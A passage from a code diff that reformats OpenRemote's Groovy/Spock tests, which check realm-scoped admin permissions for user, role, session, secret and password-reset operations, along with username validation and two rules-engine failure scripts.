+    adminUserBuildingResource.getUserClientRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, KEYCLOAK_CLIENT_ID)
+
+    then: "the cross-realm read should be rejected"
+    thrown(NotAllowedException)
+  }
+
+  def "Get user realm roles requires realm administration rights"() {
+    when: "a realm admin retrieves realm roles for a user in their own realm"
+    def sameRealmRoles = adminUserBuildingResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
+
+    then: "the roles should be returned"
+    sameRealmRoles.contains(KeycloakTestSetup.REALM_ROLE_TEST)
+
+    when: "a superuser retrieves realm roles across realms"
+    def crossRealmRoles = adminUserResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
+
+    then: "the cross-realm read should succeed for the superuser"
+    crossRealmRoles == sameRealmRoles
+
+    when: "a realm admin tries to retrieve realm roles for a user in the master realm"
+    adminUserBuildingResource.getUserRealmRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id)
+
+    then: "the cross-realm read should be rejected"
+    thrown(NotAllowedException)
+  }
+
+  def "Get user sessions requires realm administration rights"() {
+    when: "a realm admin retrieves sessions for a user in their own realm"
+    def sameRealmSessions = adminUserBuildingResource.getUserSessions(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
+
+    then: "the sessions should be returned"
+    sameRealmSessions != null
+
+    when: "a superuser retrieves sessions across realms"
+    def crossRealmSessions = adminUserResource.getUserSessions(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
+
+    then: "the cross-realm read should succeed for the superuser"
+    crossRealmSessions != null
+
+    when: "a realm admin tries to retrieve sessions for a user in the master realm"
+    adminUserBuildingResource.getUserSessions(null, MASTER_REALM, keycloakTestSetup.testuser1Id)
+
+    then: "the cross-realm read should be rejected"
+    thrown(NotAllowedException)
+  }
+
+  def "Get user sessions rejects users outside the requested realm"() {
+    when: "a realm admin uses their own realm path with a user ID from another realm"
+    adminUserBuildingResource.getUserSessions(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser1Id)
+
+    then: "the mismatched user realm should be rejected"
+    thrown(NotAllowedException)
+  }
+
+  def "Request password reset"() {
+    when: "a user with ${Constants.WRITE_USER_ROLE} permission requests a password reset for themselves"
+    regularUserBuildingResource.requestPasswordResetCurrent(null)
+
+    then: "it should succeed"
+    resetPasswordRequests == 1
+
+    when: "the same user requests a password reset for another user in the same realm"
+    regularUserBuildingResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2.id)
+
+    then: "an exception should occur"
+    thrown(ForbiddenException)
+
+    when: "the same user requests a password reset for another user in a different realm"
+    regularUserBuildingResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser1.id)
+
+    then: "an exception should occur"
+    thrown(ForbiddenException)
+
+    when: "a user with ${Constants.WRITE_ADMIN_ROLE} role requests a password reset for another user in the same realm"
+    adminUserBuildingResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2.id)
+
+    then: "it should succeed"
+    resetPasswordRequests == 2
+
+    when: "a user with ${Constants.WRITE_ADMIN_ROLE} role in one realm requests a password reset for another user in a different realm"
+    adminUserBuildingResource.requestPasswordReset(null, MASTER_REALM, keycloakTestSetup.testuser1.id)
+
+    then: "an exception should occur"
+    thrown(NotAllowedException)
+
+    when: "a super admin requests a password reset for another user in a different realm"
+    adminUserResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2.id)
+
+    then: "it should succeed"
+    resetPasswordRequests == 3
+  }
+
+  def "Update user realm roles requires realm administration rights"() {
+    when: "a realm admin updates realm roles for a user in their own realm"
+    adminUserBuildingResource.updateUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, [KeycloakTestSetup.REALM_ROLE_TEST] as String[])
+
+    then: "the role update should succeed"
+    adminUserResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id) == [KeycloakTestSetup.REALM_ROLE_TEST] as String[]
+
+    when: "a superuser updates realm roles across realms"
+    adminUserResource.updateUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, [KeycloakTestSetup.REALM_ROLE_TEST2] as String[])
+
+    then: "the cross-realm update should succeed for the superuser"
+    adminUserResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id) == [KeycloakTestSetup.REALM_ROLE_TEST2] as String[]
+
+    when: "a realm admin tries to update realm roles for a user in the master realm"
+    adminUserBuildingResource.updateUserRealmRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, [Constants.SUPER_USER_REALM_ROLE] as String[])
+
+    then: "the cross-realm update should be rejected"
+    thrown(NotAllowedException)
+  }
+
+  def "Create invalid users"() {
+
+    when: "a regular user is created"
+    String username1 = "openremoteuser"
+    User user1 = new User().setUsername(username1)
+    adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user1)
+
+    then: "user1 is fetched correctly"
+    User[] users = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+    assert users.size() == (4 + 1)
+    assert users.any { it.username == username1 }
+
+    /* ---------- */
+
+    when: "the same user is created again"
+    adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user1)
+
+    then: "an exception is thrown, because it already exists"
+    thrown(ForbiddenException)
+
+    /* ---------- */
+
+    when: "a user with only special characters is created"
+    String username2 = '#$%^&*()' // only includes illegal characters
+    User user2 = new User().setUsername(username2)
+    adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user2)
+
+    then: "the invalid character-only username causes an exception to be thrown"
+    thrown(BadRequestException)
+
+    /* ---------- */
+
+    when: "a user with a few special characters is created"
+    String username3 = "openremoteuser!"
+    User user3 = new User().setUsername(username3)
+    adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user3)
+
+    then: "the single exclamation mark should cause an exception to be thrown"
+    thrown(BadRequestException)
+
+    /* ---------- */
+
+    when: "a user is created with their email address as username"
+    String username4 = "developers@openremote.io"
+    User user4 = new User().setUsername(username4)
+    adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user4)
+
+    then: "user4 is created correctly"
+    User[] users4 = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+    assert users4.size() == (4 + 2)
+    assert users4.any { it.username == username4 }
+
+    /* ---------- */
+
+    when: "a user is created with a special email address as their username"
+    String username5 = "dev_dev-dev.dev+dev++dev__ßçʊ@openremote.io" // all special characters should be valid
+    User user5 = new User().setUsername(username5)
+    adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user5)
+
+    then: "user5 is created correctly"
+    User[] users5 = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
+    assert users5.size() == (4 + 3)
+    assert users5.any { it.username == username5 }
+  }
+
+  def "Create user requires realm administration rights"() {
+    String sameRealmUsername = "sameRealmCreate" + System.nanoTime()
+    String superuserRealmUsername = "superuserCreate" + System.nanoTime()
+    String crossRealmUsername = "crossRealmCreate" + System.nanoTime()
+    User sameRealmUser = null
+    User superuserRealmUser = null
+    User crossRealmUser = null
+
+    when: "a realm admin creates a user in their own realm"
+    sameRealmUser = adminUserBuildingResource.create(null, keycloakTestSetup.realmBuilding.name, new User().setUsername(sameRealmUsername))
+
+    then: "the user should be created"
+    sameRealmUser != null
+    sameRealmUser.realm == keycloakTestSetup.realmBuilding.name
+
+    when: "a superuser creates a user across realms"
+    superuserRealmUser = adminUserResource.create(null, keycloakTestSetup.realmBuilding.name, new User().setUsername(superuserRealmUsername))
+
+    then: "the cross-realm create should succeed for the superuser"
+    superuserRealmUser != null
+    superuserRealmUser.realm == keycloakTestSetup.realmBuilding.name
+
+    when: "a realm admin tries to create a user in the master realm"
+    crossRealmUser = adminUserBuildingResource.create(null, MASTER_REALM, new User().setUsername(crossRealmUsername))
+
+    then: "the cross-realm create should be rejected"
+    thrown(NotAllowedException)
+
+    cleanup:
+    if (sameRealmUser?.id) {
+      adminUserResource.delete(null, sameRealmUser.realm, sameRealmUser.id)
     }
-
-    def "Get user requires realm administration rights"() {
-        when: "a realm admin retrieves a user from their own realm"
-        def sameRealmUser = adminUserBuildingResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
-
-        then: "the user should be returned"
-        sameRealmUser != null
-        sameRealmUser.id == keycloakTestSetup.testuser2Id
-        sameRealmUser.realm == keycloakTestSetup.realmBuilding.name
-
-        when: "a superuser retrieves a user across realms"
-        def crossRealmUser = adminUserResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
-
-        then: "the cross-realm read should succeed for the superuser"
-        crossRealmUser != null
-        crossRealmUser.id == keycloakTestSetup.testuser2Id
-
-        when: "a realm admin tries to retrieve a user from the master realm"
-        adminUserBuildingResource.get(null, MASTER_REALM, keycloakTestSetup.testuser1Id)
-
-        then: "the cross-realm read should be rejected"
-        thrown(NotAllowedException)
-
-        when: "a realm admin uses their own realm path with a user ID from another realm"
-        adminUserBuildingResource.get(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser1Id)
-
-        then: "the mismatched user realm should be rejected"
-        thrown(NotAllowedException)
+    if (superuserRealmUser?.id) {
+      adminUserResource.delete(null, superuserRealmUser.realm, superuserRealmUser.id)
     }
-
-    def "Get user client roles requires realm administration rights"() {
-        when: "a realm admin retrieves client roles for a user in their own realm"
-        def sameRealmRoles = adminUserBuildingResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID)
-
-        then: "the roles should be returned"
-        sameRealmRoles as Set == [
-            ClientRole.WRITE_USER.value,
-            ClientRole.READ_MAP.value,
-            ClientRole.READ_ASSETS.value
-        ] as Set
-
-        when: "a superuser retrieves client roles across realms"
-        def crossRealmRoles = adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID)
-
-        then: "the cross-realm read should succeed for the superuser"
-        crossRealmRoles as Set == sameRealmRoles as Set
-
-        when: "a realm admin tries to retrieve client roles for a user in the master realm"
-        adminUserBuildingResource.getUserClientRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, KEYCLOAK_CLIENT_ID)
-
-        then: "the cross-realm read should be rejected"
-        thrown(NotAllowedException)
+    if (crossRealmUser?.id) {
+      adminUserResource.delete(null, MASTER_REALM, crossRealmUser.id)
     }
+  }
 
-    def "Get user realm roles requires realm administration rights"() {
-        when: "a realm admin retrieves realm roles for a user in their own realm"
-        def sameRealmRoles = adminUserBuildingResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
+  def "Reset secret requires realm administration rights"() {
+    when: "a realm admin resets a secret in their own realm"
+    String sameRealmSecret = adminUserBuildingResource.resetSecret(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.serviceUser.id)
 
-        then: "the roles should be returned"
-        sameRealmRoles.contains(KeycloakTestSetup.REALM_ROLE_TEST)
+    then: "the secret reset should succeed"
+    sameRealmSecret != null
+    !sameRealmSecret.isEmpty()
 
-        when: "a superuser retrieves realm roles across realms"
-        def crossRealmRoles = adminUserResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser3Id)
+    when: "a superuser resets a secret across realms"
+    String superuserSecret = adminUserResource.resetSecret(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.serviceUser.id)
 
-        then: "the cross-realm read should succeed for the superuser"
-        crossRealmRoles == sameRealmRoles
+    then: "the cross-realm reset should succeed for the superuser"
+    superuserSecret != null
+    !superuserSecret.isEmpty()
 
-        when: "a realm admin tries to retrieve realm roles for a user in the master realm"
-        adminUserBuildingResource.getUserRealmRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id)
+    when: "a realm admin tries to reset a secret in the master realm"
+    adminUserBuildingResource.resetSecret(null, MASTER_REALM, keycloakTestSetup.superServiceUser.id)
 
-        then: "the cross-realm read should be rejected"
-        thrown(NotAllowedException)
-    }
+    then: "the cross-realm reset should be rejected"
+    thrown(NotAllowedException)
+  }
 
-    def "Get user sessions requires realm administration rights"() {
-        when: "a realm admin retrieves sessions for a user in their own realm"
-        def sameRealmSessions = adminUserBuildingResource.getUserSessions(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
+  def "Update user client roles requires realm administration rights"() {
+    String[] buildingUserRoles = adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID)
+    String[] masterUserRoles = adminUserResource.getUserClientRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, KEYCLOAK_CLIENT_ID)
 
-        then: "the sessions should be returned"
-        sameRealmSessions != null
+    when: "a realm admin updates client roles for a user in their own realm"
+    adminUserBuildingResource.updateUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, buildingUserRoles, KEYCLOAK_CLIENT_ID)
 
-        when: "a superuser retrieves sessions across realms"
-        def crossRealmSessions = adminUserResource.getUserSessions(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id)
+    then: "the role update should succeed"
+    adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID) as Set == buildingUserRoles as Set
 
-        then: "the cross-realm read should succeed for the superuser"
-        crossRealmSessions != null
+    when: "a superuser updates client roles across realms"
+    adminUserResource.updateUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, buildingUserRoles, KEYCLOAK_CLIENT_ID)
 
-        when: "a realm admin tries to retrieve sessions for a user in the master realm"
-        adminUserBuildingResource.getUserSessions(null, MASTER_REALM, keycloakTestSetup.testuser1Id)
+    then: "the cross-realm update should succeed for the superuser"
+    adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID) as Set == buildingUserRoles as Set
 
-        then: "the cross-realm read should be rejected"
-        thrown(NotAllowedException)
-    }
+    when: "a realm admin tries to update client roles for a user in the master realm"
+    adminUserBuildingResource.updateUserClientRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, masterUserRoles, KEYCLOAK_CLIENT_ID)
 
-    def "Get user sessions rejects users outside the requested realm"() {
-        when: "a realm admin uses their own realm path with a user ID from another realm"
-        adminUserBuildingResource.getUserSessions(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser1Id)
+    then: "the cross-realm update should be rejected"
+    thrown(NotAllowedException)
+  }
 
-        then: "the mismatched user realm should be rejected"
-        thrown(NotAllowedException)
-    }
+  def "Update default client roles requires realm administration rights"() {
+    Role[] buildingRoles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
+    Role[] masterRoles = adminUserResource.getClientRoles(null, MASTER_REALM, KEYCLOAK_CLIENT_ID)
 
-    def "Request password reset"() {
-        when: "a user with ${Constants.WRITE_USER_ROLE} permission requests a password reset for themselves"
-        regularUserBuildingResource.requestPasswordResetCurrent(null)
+    when: "a realm admin updates default client roles in their own realm"
+    adminUserBuildingResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles)
 
-        then: "it should succeed"
-        resetPasswordRequests == 1
+    then: "the role update should succeed"
+    adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
 
-        when: "the same user requests a password reset for another user in the same realm"
-        regularUserBuildingResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2.id)
+    when: "a superuser updates default client roles across realms"
+    adminUserResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles)
 
-        then: "an exception should occur"
-        thrown(ForbiddenException)
+    then: "the cross-realm update should succeed for the superuser"
+    adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
 
-        when: "the same user requests a password reset for another user in a different realm"
-        regularUserBuildingResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser1.id)
+    when: "a realm admin tries to update default client roles in the master realm"
+    adminUserBuildingResource.updateRoles(null, MASTER_REALM, masterRoles)
 
-        then: "an exception should occur"
-        thrown(ForbiddenException)
+    then: "the cross-realm update should be rejected"
+    thrown(NotAllowedException)
+  }
 
-        when: "a user with ${Constants.WRITE_ADMIN_ROLE} role requests a password reset for another user in the same realm"
-        adminUserBuildingResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2.id)
+  def "Update client roles requires realm administration rights"() {
+    Role[] buildingRoles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
+    Role[] masterRoles = adminUserResource.getClientRoles(null, MASTER_REALM, KEYCLOAK_CLIENT_ID)
 
-        then: "it should succeed"
-        resetPasswordRequests == 2
+    when: "a realm admin updates client roles in their own realm"
+    adminUserBuildingResource.updateClientRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles, KEYCLOAK_CLIENT_ID)
 
-        when: "a user with ${Constants.WRITE_ADMIN_ROLE} role in one realm requests a password reset for another user in a different realm"
-        adminUserBuildingResource.requestPasswordReset(null, MASTER_REALM, keycloakTestSetup.testuser1.id)
+    then: "the role update should succeed"
+    adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
 
-        then: "an exception should occur"
-        thrown(NotAllowedException)
+    when: "a superuser updates client roles across realms"
+    adminUserResource.updateClientRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles, KEYCLOAK_CLIENT_ID)
 
-        when: "a super admin requests a password reset for another user in a different realm"
-        adminUserResource.requestPasswordReset(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2.id)
+    then: "the cross-realm update should succeed for the superuser"
+    adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
 
-        then: "it should succeed"
-        resetPasswordRequests == 3
-    }
+    when: "a realm admin tries to update client roles in the master realm"
+    adminUserBuildingResource.updateClientRoles(null, MASTER_REALM, masterRoles, KEYCLOAK_CLIENT_ID)
 
-    def "Update user realm roles requires realm administration rights"() {
-        when: "a realm admin updates realm roles for a user in their own realm"
-        adminUserBuildingResource.updateUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, [
-            KeycloakTestSetup.REALM_ROLE_TEST
-        ] as String[])
-
-        then: "the role update should succeed"
-        adminUserResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id) == [
-            KeycloakTestSetup.REALM_ROLE_TEST
-        ] as String[]
-
-        when: "a superuser updates realm roles across realms"
-        adminUserResource.updateUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, [
-            KeycloakTestSetup.REALM_ROLE_TEST2
-        ] as String[])
-
-        then: "the cross-realm update should succeed for the superuser"
-        adminUserResource.getUserRealmRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id) == [
-            KeycloakTestSetup.REALM_ROLE_TEST2
-        ] as String[]
-
-        when: "a realm admin tries to update realm roles for a user in the master realm"
-        adminUserBuildingResource.updateUserRealmRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, [
-            Constants.SUPER_USER_REALM_ROLE
-        ] as String[])
-
-        then: "the cross-realm update should be rejected"
-        thrown(NotAllowedException)
-    }
-
-    def "Create invalid users"() {
-
-        when: "a regular user is created"
-        String username1 = "openremoteuser"
-        User user1 = new User().setUsername(username1)
-        adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user1)
-
-        then: "user1 is fetched correctly"
-        User[] users = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
-        assert users.size() == (4 + 1)
-        assert users.any { it.username == username1 }
-
-        /* ---------- */
-
-        when: "the same user is created again"
-        adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user1)
-
-        then: "an exception is thrown, because it already exists"
-        thrown(ForbiddenException)
-
-        /* ---------- */
-
-        when: "a user with only special characters is created"
-        String username2 = '#$%^&*()' // only includes illegal characters
-        User user2 = new User().setUsername(username2)
-        adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user2)
-
-        then: "the invalid character-only username causes an exception to be thrown"
-        thrown(BadRequestException)
-
-        /* ---------- */
-
-        when: "a user with a few special characters is created"
-        String username3 = "openremoteuser!"
-        User user3 = new User().setUsername(username3)
-        adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user3)
-
-        then: "the single exclamation mark should cause an exception to be thrown"
-        thrown(BadRequestException)
-
-        /* ---------- */
-
-        when: "a user is created with their email address as username"
-        String username4 = "developers@openremote.io"
-        User user4 = new User().setUsername(username4)
-        adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user4)
-
-        then: "user4 is created correctly"
-        User[] users4 = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
-        assert users4.size() == (4 + 2)
-        assert users4.any { it.username == username4 }
-
-        /* ---------- */
-
-        when: "a user is created with a special email address as their username"
-        String username5 = "dev_dev-dev.dev+dev++dev__ßçʊ@openremote.io" // all special characters should be valid
-        User user5 = new User().setUsername(username5)
-        adminUserResource.create(null, keycloakTestSetup.realmMaster.name, user5)
-
-        then: "user5 is created correctly"
-        User[] users5 = adminUserResource.query(null, new UserQuery().realm(new RealmPredicate(keycloakTestSetup.realmMaster.name)))
-        assert users5.size() == (4 + 3)
-        assert users5.any { it.username == username5 }
-    }
-
-    def "Create user requires realm administration rights"() {
-        String sameRealmUsername = "sameRealmCreate" + System.nanoTime()
-        String superuserRealmUsername = "superuserCreate" + System.nanoTime()
-        String crossRealmUsername = "crossRealmCreate" + System.nanoTime()
-        User sameRealmUser = null
-        User superuserRealmUser = null
-        User crossRealmUser = null
-
-        when: "a realm admin creates a user in their own realm"
-        sameRealmUser = adminUserBuildingResource.create(null, keycloakTestSetup.realmBuilding.name, new User().setUsername(sameRealmUsername))
-
-        then: "the user should be created"
-        sameRealmUser != null
-        sameRealmUser.realm == keycloakTestSetup.realmBuilding.name
-
-        when: "a superuser creates a user across realms"
-        superuserRealmUser = adminUserResource.create(null, keycloakTestSetup.realmBuilding.name, new User().setUsername(superuserRealmUsername))
-
-        then: "the cross-realm create should succeed for the superuser"
-        superuserRealmUser != null
-        superuserRealmUser.realm == keycloakTestSetup.realmBuilding.name
-
-        when: "a realm admin tries to create a user in the master realm"
-        crossRealmUser = adminUserBuildingResource.create(null, MASTER_REALM, new User().setUsername(crossRealmUsername))
-
-        then: "the cross-realm create should be rejected"
-        thrown(NotAllowedException)
-
-        cleanup:
-        if (sameRealmUser?.id) {
-            adminUserResource.delete(null, sameRealmUser.realm, sameRealmUser.id)
-        }
-        if (superuserRealmUser?.id) {
-            adminUserResource.delete(null, superuserRealmUser.realm, superuserRealmUser.id)
-        }
-        if (crossRealmUser?.id) {
-            adminUserResource.delete(null, MASTER_REALM, crossRealmUser.id)
-        }
-    }
-
-    def "Reset secret requires realm administration rights"() {
-        when: "a realm admin resets a secret in their own realm"
-        String sameRealmSecret = adminUserBuildingResource.resetSecret(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.serviceUser.id)
-
-        then: "the secret reset should succeed"
-        sameRealmSecret != null
-        !sameRealmSecret.isEmpty()
-
-        when: "a superuser resets a secret across realms"
-        String superuserSecret = adminUserResource.resetSecret(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.serviceUser.id)
-
-        then: "the cross-realm reset should succeed for the superuser"
-        superuserSecret != null
-        !superuserSecret.isEmpty()
-
-        when: "a realm admin tries to reset a secret in the master realm"
-        adminUserBuildingResource.resetSecret(null, MASTER_REALM, keycloakTestSetup.superServiceUser.id)
-
-        then: "the cross-realm reset should be rejected"
-        thrown(NotAllowedException)
-    }
-
-    def "Update user client roles requires realm administration rights"() {
-        String[] buildingUserRoles = adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID)
-        String[] masterUserRoles = adminUserResource.getUserClientRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, KEYCLOAK_CLIENT_ID)
-
-        when: "a realm admin updates client roles for a user in their own realm"
-        adminUserBuildingResource.updateUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, buildingUserRoles, KEYCLOAK_CLIENT_ID)
-
-        then: "the role update should succeed"
-        adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID) as Set == buildingUserRoles as Set
-
-        when: "a superuser updates client roles across realms"
-        adminUserResource.updateUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, buildingUserRoles, KEYCLOAK_CLIENT_ID)
-
-        then: "the cross-realm update should succeed for the superuser"
-        adminUserResource.getUserClientRoles(null, keycloakTestSetup.realmBuilding.name, keycloakTestSetup.testuser2Id, KEYCLOAK_CLIENT_ID) as Set == buildingUserRoles as Set
-
-        when: "a realm admin tries to update client roles for a user in the master realm"
-        adminUserBuildingResource.updateUserClientRoles(null, MASTER_REALM, keycloakTestSetup.testuser1Id, masterUserRoles, KEYCLOAK_CLIENT_ID)
-
-        then: "the cross-realm update should be rejected"
-        thrown(NotAllowedException)
-    }
-
-    def "Update default client roles requires realm administration rights"() {
-        Role[] buildingRoles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
-        Role[] masterRoles = adminUserResource.getClientRoles(null, MASTER_REALM, KEYCLOAK_CLIENT_ID)
-
-        when: "a realm admin updates default client roles in their own realm"
-        adminUserBuildingResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles)
-
-        then: "the role update should succeed"
-        adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
-
-        when: "a superuser updates default client roles across realms"
-        adminUserResource.updateRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles)
-
-        then: "the cross-realm update should succeed for the superuser"
-        adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
-
-        when: "a realm admin tries to update default client roles in the master realm"
-        adminUserBuildingResource.updateRoles(null, MASTER_REALM, masterRoles)
-
-        then: "the cross-realm update should be rejected"
-        thrown(NotAllowedException)
-    }
-
-    def "Update client roles requires realm administration rights"() {
-        Role[] buildingRoles = adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)
-        Role[] masterRoles = adminUserResource.getClientRoles(null, MASTER_REALM, KEYCLOAK_CLIENT_ID)
-
-        when: "a realm admin updates client roles in their own realm"
-        adminUserBuildingResource.updateClientRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles, KEYCLOAK_CLIENT_ID)
-
-        then: "the role update should succeed"
-        adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
-
-        when: "a superuser updates client roles across realms"
-        adminUserResource.updateClientRoles(null, keycloakTestSetup.realmBuilding.name, buildingRoles, KEYCLOAK_CLIENT_ID)
-
-        then: "the cross-realm update should succeed for the superuser"
-        adminUserResource.getClientRoles(null, keycloakTestSetup.realmBuilding.name, KEYCLOAK_CLIENT_ID)*.name as Set == buildingRoles*.name as Set
-
-        when: "a realm admin tries to update client roles in the master realm"
-        adminUserBuildingResource.updateClientRoles(null, MASTER_REALM, masterRoles, KEYCLOAK_CLIENT_ID)
-
-        then: "the cross-realm update should be rejected"
-        thrown(NotAllowedException)
-    }
+    then: "the cross-realm update should be rejected"
+    thrown(NotAllowedException)
+  }
 }

--- a/test/src/test/resources/org/openremote/test/failure/RulesFailureActionThrowsException.groovy
+++ b/test/src/test/resources/org/openremote/test/failure/RulesFailureActionThrowsException.groovy
@@ -24,11 +24,9 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("Action always throws exception")
-        .when(
-        { facts ->
-            true
+        .when({ facts ->
+          true
         })
-        .then(
-        { facts ->
-            throw new RuntimeException("Oops")
+        .then({ facts ->
+          throw new RuntimeException("Oops")
         })

--- a/test/src/test/resources/org/openremote/test/failure/RulesFailureConditionInvalidReturn.groovy
+++ b/test/src/test/resources/org/openremote/test/failure/RulesFailureConditionInvalidReturn.groovy
@@ -25,11 +25,9 @@ RulesBuilder rules = binding.rules
 
 rules.add()
         .name("The when condition is illegal, it's returning an Optional instead of a boolean")
-        .when(
-        { facts ->
-            facts.matchLastAssetEvent(new AssetQuery())
+        .when({ facts ->
+          facts.matchLastAssetEvent(new AssetQuery())
         })
-        .then(
-        { facts ->
-            // Never called
+        .then({ facts ->
+          // Never called
         })

--- a/test/src/test/resources/org/openremote/test/failure/RulesFailureConditionThrowsException.groovy
+++ b/test/src/test/resources/org/openremote/test/failure/RulesFailureConditionThrowsException.groovy
